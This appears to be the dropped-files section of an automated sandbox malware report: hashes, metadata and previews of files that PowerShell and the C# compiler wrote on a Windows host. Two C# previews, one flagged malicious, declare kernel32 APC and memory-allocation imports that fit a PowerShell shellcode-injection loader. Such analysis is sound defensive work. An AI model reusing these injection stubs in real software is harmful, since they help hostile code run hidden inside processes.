                                                                                Preview: /** .. * onetrust-banner-sdk.. * v6.7.0.. * by OneTrust LLC.. * Copyright 2020 .. */..!function () { "use strict"; var o = function (e, t) { return (o = Object.setPrototypeOf || { __proto__: [] } instanceof Array && function (e, t) { e.__proto__ = t } || function (e, t) { for (var o in t) t.hasOwnProperty(o) && (e[o] = t[o]) })(e, t) }; var r = function () { return (r = Object.assign || function (e) { for (var t, o = 1, n = arguments.length; o < n; o++)for (var r in t = arguments[o]) Object.prototype.hasOwnProperty.call(t, r) && (e[r] = t[r]); return e }).apply(this, arguments) }; function l(s, i, a, l) { return new (a = a || Promise)(function (e, t) { function o(e) { try { r(l.next(e)) } catch (e) { t(e) } } function n(e) { try { r(l.throw(e)) } catch (e) { t(e) } } function r(t) { t.done ? e(t.value) : new a(function (e) { e(t.value) }).then(o, n) } r((l = l.apply(s, i || [])).next()) }) } function k(o, n) { var r, s, i, e, a = { label: 0, sent: function () { if (1 & i[0]) throw i[1]
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):11606
                                                                                Entropy (8bit):4.8910535897909355
                                                                                Encrypted:false
                                                                                SSDEEP:192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
                                                                                MD5:7A57D8959BFD0B97B364F902ACD60F90
                                                                                SHA1:7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
                                                                                SHA-256:47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
                                                                                SHA-512:83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
                                                                                Malicious:false
                                                                                Preview: PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1192
                                                                                Entropy (8bit):5.325275554903011
                                                                                Encrypted:false
                                                                                SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKaBPnKdi5:qEPerB4nqRL/HvFe9t4CvpBfui5
                                                                                MD5:C85C42A32E22DE29393FCCCCF3BBA96E
                                                                                SHA1:EAF3755C63061C96400536041D4F4EB8BC66E99E
                                                                                SHA-256:9022F6D5F92065B07E1C63F551EC66E19B13E067C179C65EF520BA10DA8AE42C
                                                                                SHA-512:7708F8C2F4A6B362E35CED939F87B1232F19E16F191A67E29A00E6BB3CDCE89299E9A8D7129C3DFBF39C2B0EBAF160A8455D520D5BFB9619E4CDA5CC9BDCF550
                                                                                Malicious:false
                                                                                Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                C:\Users\user\AppData\Local\Temp\RES3AD7.tmp
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):2184
                                                                                Entropy (8bit):2.7127201551206244
                                                                                Encrypted:false
                                                                                SSDEEP:24:p+fAlyVYDfHQhhKdNNI+ycuZhNjakSVPNnq9qp5e9Ep:cAs8wvKd31ulja3Pq9e
                                                                                MD5:DB55F6B8F7AF9E318FE69ED67E1AE930
                                                                                SHA1:C7CDD348AB1E16C6263949CEBA2944EA832DE7FF
                                                                                SHA-256:5934FDAAE975309A02AD81A2289E0D88DDC32DBE8BBEB081D9C58F13BC1F9F3F
                                                                                SHA-512:460C2AFC4A84396959AA86D45BED5C4701173F6C5391083BC74EA43A8FC728DE761BD86BE4777E3C8E7EDFB7BBB0DA0B93F3D1FA4CC658ED0D9CD015AF2760C2
                                                                                Malicious:false
                                                                                Preview: ........T....c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP...............#...kV................4.......C:\Users\user\AppData\Local\Temp\RES3AD7.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\RES4CF7.tmp
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):2184
                                                                                Entropy (8bit):2.699790458157591
                                                                                Encrypted:false
                                                                                SSDEEP:24:bZfTXaDfHPhKdNNI+ycuZhNxakSPPNnq9qp1ke9Ep:bBDgJKd31ulxa3Nq9IK
                                                                                MD5:195136ECBE387CDCD604D66CD99FA32B
                                                                                SHA1:EA045FF0A8FF0512A9BDAC369031011B768232E0
                                                                                SHA-256:DA5530A9E8423DC63F4BF7DD0195D5D8C6AC76E62EB403E1D0295B81AD294216
                                                                                SHA-512:634DD24540F8C60D75F350F4C880216F8918C2B4F36829C65EE29EE8754FB3A38DEF21EC7A230F430D999D3A1D403D71B97B73A5D713F8A3714384EC6704A780
                                                                                Malicious:false
                                                                                Preview: ........S....c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP................,:.f ...3..Mb............4.......C:\Users\user\AppData\Local\Temp\RES4CF7.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g3p5jkb.b5s.psm1
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview: 1
                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zr1lulwh.tdw.ps1
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview: 1
                                                                                C:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                File Type:MSVC .res
                                                                                Category:dropped
                                                                                Size (bytes):652
                                                                                Entropy (8bit):3.080375887352444
                                                                                Encrypted:false
                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRak7YnqqVPN5Dlq5J:+RI+ycuZhNjakSVPNnqX
                                                                                MD5:23121F156B5618DBCCBEC98A14E79BA8
                                                                                SHA1:6EAC5FC0D4D3321AABB87C4C765ED4909753904D
                                                                                SHA-256:47A1CEDFEFE72CA448AB56B3C316CF2B36BCC48144A0B44E59E7C59F34AB398A
                                                                                SHA-512:71A42236CE7A6589A67968EE7A20E95BAE2DB493F5323A40D15764907DC63CE09DCD490E5731564FAFF68CFFDE552A674CFA6150061B09B1A262C2F1B9B1A9CB
                                                                                Malicious:false
                                                                                Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.a.y.i.4.a.b.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.a.y.i.4.a.b.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.0.cs
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:UTF-8 Unicode (with BOM) text
                                                                                Category:dropped
                                                                                Size (bytes):409
                                                                                Entropy (8bit):5.052013007754227
                                                                                Encrypted:false
                                                                                SSDEEP:6:V/DsYLDS81zuJv/VMRSR7a13o4OSSRa+rVSSRnA/fAqFQy:V/DTLDfu3F4O59rV5nA/TFQy
                                                                                MD5:9FD7479AC9BD39EAF111AEDEC976D3AA
                                                                                SHA1:43E99395C9BC72CE1A0280EAB7785DF4A28A7315
                                                                                SHA-256:3ADE2B51AA3CC413287C4D1C4C85E45C43143CC7871AE72387D161B564D998CF
                                                                                SHA-512:78F2086E6D4D5F72354F9FF5F8A8D58EF4F162B1F3BFCFD6D87A817980A68E61AF08CBA8B00D2ED7B33E8A75AD15416AF0B6CB9B1C4F9400FE950101AC297467
                                                                                Malicious:false
                                                                                Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class unnvjs. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr ebfsgcy,IntPtr wwxwfnuwpfa,IntPtr ixqmfwmf);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ikqvo,uint uoskv,IntPtr edyfcvneu);.. }..}.
                                                                                C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):369
                                                                                Entropy (8bit):5.2038129268622955
                                                                                Encrypted:false
                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fIhOLkzxs7+AEszIwkn23fIhOLXxn:p37Lvkmb6KRfAhOLkWZEifAhOLh
                                                                                MD5:05DA2BFCC9349B302A9CC7F516BE81D6
                                                                                SHA1:190F783218A076D5F9738407F55936CC70A84F1E
                                                                                SHA-256:13F94D21CB62133A655298B9B86B6321275B87B26B85359B03CF85C4C1BE6EAB
                                                                                SHA-512:A1DA627C0211A9C52549AA97AB41F767355399BE3894E701EF963A9E231674916356D028151182392B458D7EE28E6FFCB107872E785C030EED4E1ED2FBFF3D30
                                                                                Malicious:true
                                                                                Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.0.cs"
                                                                                C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.dll
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):3584
                                                                                Entropy (8bit):2.6302636060426288
                                                                                Encrypted:false
                                                                                SSDEEP:24:etGSr8mmDg85z79Eo1egHop64NEtkZf6m/at3hkh+I+ycuZhNjakSVPNnq:6Rmb5NR/gbJF/aLK+1ulja3Pq
                                                                                MD5:EB8F2ABC76A1DDA6DBE4632830246B64
                                                                                SHA1:32697939CD9B578C7F463D4976E90B88E5AA3DAE
                                                                                SHA-256:CA29669E1473A60361534DAA292EBBB837A975DA5BB4F7922FEAA5AAC5A79EA0
                                                                                SHA-512:889438486CE35E35E1E93DAB0CF58A3CAF83A3E5C06591B287A3A4E8841E4C2CE7C680142ADACBF989EE1A5236B780EEFCB67DC68FE795CE58B0F40297DD702A
                                                                                Malicious:false
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....+`...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......@...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............#...................................... 9............ F............ Y.....P ......d.........j.....r.....~.....................d. ...d...!.d.%...d.......*.....3.6.....9.......F.......Y......................................."........<Module>.gayi4abp.dll.unnvjs.W32.mscorlib.S
                                                                                C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.out
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                Category:modified
                                                                                Size (bytes):412
                                                                                Entropy (8bit):4.871364761010112
                                                                                Encrypted:false
                                                                                SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                Malicious:false
                                                                                Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                C:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                File Type:MSVC .res
                                                                                Category:dropped
                                                                                Size (bytes):652
                                                                                Entropy (8bit):3.083418702360773
                                                                                Encrypted:false
                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryDak7YnqqPPN5Dlq5J:+RI+ycuZhNxakSPPNnqX
                                                                                MD5:2C3AE4B96620D01A1F33988D4D62BDC4
                                                                                SHA1:6216CFF8DDB2C0F3FFDF65C9C98E8F8D2ED1E2E6
                                                                                SHA-256:01C0D783ED0B2A8038C58A97F7E15E4202F50AC65E25BB29B86FEC466A06DE10
                                                                                SHA-512:ED9A45C4AA7DD146B8B4C868B4503372A3B65D943746C5F916CBEFEE73415D9B41ADFDCA8A28D7B975E7CC1325F0A213BA0155D9D7A5767D5C85CC60F19EE0CA
                                                                                Malicious:false
                                                                                Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.i.0.g.y.o.x.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.i.0.g.y.o.x.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.0.cs
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:UTF-8 Unicode (with BOM) text
                                                                                Category:dropped
                                                                                Size (bytes):414
                                                                                Entropy (8bit):5.0112862311676984
                                                                                Encrypted:false
                                                                                SSDEEP:6:V/DsYLDS81zuJd0PMRSRa+eNMjSSRrSBHJkSRHq1/ieA7iolWwy:V/DTLDfu309eg5rSjvu6/7iolWwy
                                                                                MD5:9E60DAE8669F4427D81524FC662E0E11
                                                                                SHA1:63CC313ED28BC014023379CBDCFAA5DE102AE47C
                                                                                SHA-256:153DE2EE6E519F011708A8F64105253F479B82D64D695D2343FAE9213D677133
                                                                                SHA-512:963CACF3B2BC7D60E0EC5D2A52C8FD6AB4E81D64B0D8C5D4409A5170B9D164DCFA1F2E7AEDAB732D198BAADF74C2DEFF82C8370BA5E2B13E8170BF94213B50CF
                                                                                Malicious:true
                                                                                Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class vsswd. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint mvgrgqg,uint scbstveeig);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr lpqyi,IntPtr tfl,uint yjmgjhtw,uint gvbkpogio,uint ctoxlkyqq);.. }..}.
                                                                                C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):369
                                                                                Entropy (8bit):5.2404904218730755
                                                                                Encrypted:false
                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fmzxs7+AEszIwkn23fBGA:p37Lvkmb6KRfeWZEifT
                                                                                MD5:CD09E9D4D72BCDDB6267560EE2F0D944
                                                                                SHA1:1A65484932E5AD734F2F7E291A533BC21ACC9451
                                                                                SHA-256:2ECB2DAF7D97E166AF6E64E9C283B67C23D0241A60278048A13155906D6F6104
                                                                                SHA-512:AF05A0226CF9CB3CA2BA3EBBFC7EDEC834EF63F9D8C4D7D14ADD473253A189A17EDDFADAA0E6ECA006D2AC261910052888BFAD76EFDB6A6EFA46C64FA198E14F
                                                                                Malicious:false
                                                                                Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.0.cs"
                                                                                C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.dll
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):3584
                                                                                Entropy (8bit):2.625980258515641
                                                                                Encrypted:false
                                                                                SSDEEP:24:etGSvM+WEei8MTl2CLKo90k0JdWtqotkZfLrNFw7I+ycuZhNxakSPPNnq:6N7qMTlRKwIWtuJLrNs1ulxa3Nq
                                                                                MD5:11505803207BB19004B0C15AF776C05C
                                                                                SHA1:1F7358DDA484AF375759E7B7510B59FDECA0A671
                                                                                SHA-256:6263E60F9487AB3A625D9DB8F9AF121182003E24C98A6A2CB3D5DBDD2FC35990
                                                                                SHA-512:0DA180447B3629CD3D0321FE9D2E81F064DE4A01B64E039B1B222E33EC6B5323529823997968DEB58016A33D1F2A2BFF46E8780277E996034B5ADCAAD6D5529A
                                                                                Malicious:false
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....+`...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...............'...................................... 8............ J............ R.....P ......a.........g.....o.....z...........................a.!...a...!.a.&...a.......+.....4.:.....8.......J.......R.......................................!..........<Module>.wi0gyoxl.dll.vsswd.W32.msc
                                                                                C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.out
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                Category:modified
                                                                                Size (bytes):412
                                                                                Entropy (8bit):4.871364761010112
                                                                                Encrypted:false
                                                                                SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                Malicious:false
                                                                                Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                C:\Users\user\AppData\Local\Temp\~DF1332C2BC6A2109BF.TMP
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):29745
                                                                                Entropy (8bit):0.2920107282763179
                                                                                Encrypted:false
                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAC9laAC9lrz:kBqoxxJhHWSVSEabeQ2y
                                                                                MD5:CE909A43525B3843C907DCBE55E9D7DD
                                                                                SHA1:8B6E53CCBAAB132FF8100ECB696282F011402047
                                                                                SHA-256:540A8B39EAF1EF9CF341697FC4CDABBEBDED17B16321398C539639FD17EE1602
                                                                                SHA-512:027F1DF5288441E3BFF63ABABD90521E2A72DC20FFAC545E0F180483761229D13254375ADA525D3C5155C1BAC6602117B24617A160C4B9D21C30721B9DF17446
                                                                                Malicious:false
                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\~DF5FA304ED7E9A0ED0.TMP
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):40241
                                                                                Entropy (8bit):0.6864507266441422
                                                                                Encrypted:false
                                                                                SSDEEP:192:kBqoxKAuqR+djBgDKYpPktsBwYpPktsBuMYpPktsB4:kBqoxKAuqR+djBgDKsE4wsE4fsE44
                                                                                MD5:F276069208EC3C8952B6E8E8E1564B0A
                                                                                SHA1:803E9CB6E1F3E1D9574005489D475557808140D0
                                                                                SHA-256:90EA0A9C7FB910F622AB82C822FC18F72121BB4F0A2C653CA77C32F5779691D7
                                                                                SHA-512:18004ACA2C318F1ACE76B1989EEA5032F62115146C4E751FCDC19E23767009214D5931F9813AA3313941C530FCFA7F50583DFB6FED5249BD1795D1832C772B3E
                                                                                Malicious:false
                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\~DF7FAEED37798869B9.TMP
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):14037
                                                                                Entropy (8bit):1.0146837892574634
                                                                                Encrypted:false
                                                                                SSDEEP:96:kBqoIYsYyYcoL0PiEJXZvmovvOoVOO0Ra:kBqoIx3X+0PiEJXxmEvOGOO0w
                                                                                MD5:5189831F91DAF1D84A02CF4C4EE339C7
                                                                                SHA1:E71BFAB121B47FAA9DA6CF8ABA1222759347EBCA
                                                                                SHA-256:581C0E68D6BE4E812447C6949484405F2294D07406704CA9C4F1A9BB37EA8E7C
                                                                                SHA-512:D9C856AB10AC9B70519CDC42EA7BC7F14F34B7D0F0ED58B89BE77BB3C5294891C09ECA66E3D3B18EBA7227C423EDA6283E1C913F6EE03E07B864055B09325C9E
                                                                                Malicious:false
                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\~DF8631D245B69528D2.TMP
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):40177
                                                                                Entropy (8bit):0.6736146002540434
                                                                                Encrypted:false
                                                                                SSDEEP:192:kBqoxKAuqR+rl3elQB0ySjOB0ySjtB0ySje:kBqoxKAuqR+rl3elQuzOuztuze
                                                                                MD5:29B0929FAE6706ADE713FDCFEFE7D868
                                                                                SHA1:B82583F96532A79969D135037D94C42E43F89B15
                                                                                SHA-256:8D38F57A66E0D48F49BD14499D9A2497F0B2FBD91FA3728FD791839209FE25D8
                                                                                SHA-512:9E52FDACAD0B85DF6D6D390EF801A957B69E2BEFBA06BB41AB4EBE2A0DC41A7FD0C3D0E4DAB45A89BBE8603B70E0BB98ACE1D2517AF195098A03F1699BABA44A
                                                                                Malicious:false
                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\~DFAE54027CE6C0BF31.TMP
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):40161
                                                                                Entropy (8bit):0.6731060804118951
                                                                                Encrypted:false
                                                                                SSDEEP:96:kBqoxKAuvScS+B/NMPO8P5NWBJs8ESL8P5NWBJs8ESY8P5NWBJs8ESV:kBqoxKAuqR+B/NMPO8KcSL8KcSY8KcSV
                                                                                MD5:BE49A89BFD8FC4C054735CE9EA025702
                                                                                SHA1:74875F5E7256E82909B656DB12D38FBAB6008D2F
                                                                                SHA-256:08F8F086F3287129EA1139B234CAD85E79F0F64E89592B9093001EEA48B07622
